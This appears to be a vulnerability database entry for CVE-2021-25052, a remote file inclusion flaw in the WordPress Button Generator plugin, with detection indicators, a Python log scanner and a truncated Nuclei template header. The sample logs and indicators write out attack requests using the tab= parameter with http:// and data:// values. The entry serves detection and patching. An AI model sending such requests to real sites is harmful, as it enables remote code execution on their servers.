CVE-2021-25052
Published: 2022-01-10
Priority: P3 (54)
Severity: high, CVSS 3.1 base score 8.8
Vector: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Exploit: available
EPSS: 3.53% (87.8th percentile)
The Button Generator WordPress plugin before 2.3.3, within the wow-company admin menu page, allows include() of an arbitrary file with a PHP extension (as well as via the data:// or http:// protocols), thus leading to CSRF RCE.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wow-company | button_generator | < 2.3.3 | 2.3.3 |
Detection & IOCs (extracted from sources)
- Look for GET requests to /wp-admin/admin.php with the query parameter page=wow-company and a tab= parameter containing an external URL (http://, https://) or a data:// URI, indicating a remote file inclusion attempt.
- The exploit requires two steps: an authenticated POST to /wp-login.php followed by a GET to /wp-admin/admin.php?page=wow-company&tab=<remote_url>. Correlate login events with subsequent abuse of the wow-company tab parameter.
- Flag any HTTP request where the 'tab' query parameter of the wow-company admin page contains a data://, http://, or https:// scheme, as these are the supported RFI vectors.
- Exploitation requires the victim to be authenticated (or tricked via CSRF) as an admin-level WordPress user; unauthenticated exploitation is not directly possible without a CSRF vector.
- The vulnerability only affects Button Generator plugin versions before 2.3.3; version 2.3.3 and later are patched.
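A log check that applies the indicators above, added here as an example rather than taken from the page's sources. The access-log lines are constructed, the "seen a POST to /wp-login.php from the same client earlier" correlation is a hypothetical heuristic, and matching `data:` also covers `data://` (PHP accepts both spellings).

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (common log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2022:10:00:01 +0000] "POST /wp-login.php HTTP/1.1" 302 0
203.0.113.5 - - [10/Jan/2022:10:00:04 +0000] "GET /wp-admin/admin.php?page=wow-company&tab=http://example.test/x.php HTTP/1.1" 200 512
198.51.100.9 - - [10/Jan/2022:10:01:00 +0000] "GET /wp-admin/admin.php?page=wow-company&tab=data%3A%2F%2Ftext%2Fplain%3Bbase64%2CAAAA HTTP/1.1" 200 333
198.51.100.9 - - [10/Jan/2022:10:02:00 +0000] "GET /wp-admin/admin.php?page=wow-company&tab=settings HTTP/1.1" 200 1024
192.0.2.7 - - [10/Jan/2022:10:03:00 +0000] "GET /wp-admin/admin.php?page=other&tab=http://example.test/ HTTP/1.1" 200 80
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)
# Schemes named in the indicators; "data:" also matches "data://".
RFI_SCHEMES = ("http://", "https://", "data:")


def find_rfi_attempts(log_text):
    """Return one finding per wow-company request whose tab= value carries an RFI scheme."""
    findings = []
    logins = set()  # client IPs that POSTed to /wp-login.php earlier in the log (heuristic)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, url = m["ip"], m["method"], m["url"]
        parts = urlsplit(url)
        if method == "POST" and parts.path == "/wp-login.php":
            logins.add(ip)
            continue
        if parts.path != "/wp-admin/admin.php":
            continue
        qs = parse_qs(parts.query, keep_blank_values=True)
        if qs.get("page", [""])[0] != "wow-company":
            continue
        for tab in qs.get("tab", []):
            # parse_qs already decoded once; a second unquote catches double-encoded values
            value = unquote(tab).strip().lower()
            if any(scheme in value for scheme in RFI_SCHEMES):
                findings.append({"ip": ip, "ts": m["ts"], "tab": tab,
                                 "after_login": ip in logins})
    return findings


if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit)
```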
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 8.8 | HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
| NVD | 2.0 | 5.1 | MEDIUM | AV:N/AC:H/Au:N/C:P/I:P/A:P |
No detection rules found.
Nuclei
CVE-2021-25052 [HIGH] WordPress Button Generator <2.3.3 - Remote File Inclusion (nuclei · CVSS 8.8)
WordPress Button Generator before 2.3.3 within the wow-company admin menu page allows arbitrary file inclusion with PHP extensions (as well as with data:// or http:// protocols), thus leading to cross-site request forgery and remote code execution.
Template:

```yaml
id: CVE-2021-25052

info:
  name: WordPress Button Generator <2.3.3 - Remote File Inclusion
  author: cckuailong
  severity: high
  description: WordPress Button Generator before 2.3.3 within the wow-company admin menu page allows arbitrary file inclusion with PHP extensions (as well as with data:// or http:// protocols), thus leading to cross-site request forgery and remote code execution.
  impact: |
    An attacker can exploit this vulnerability to execute arbitrary code on the target s
```
No writeups or analysis indexed.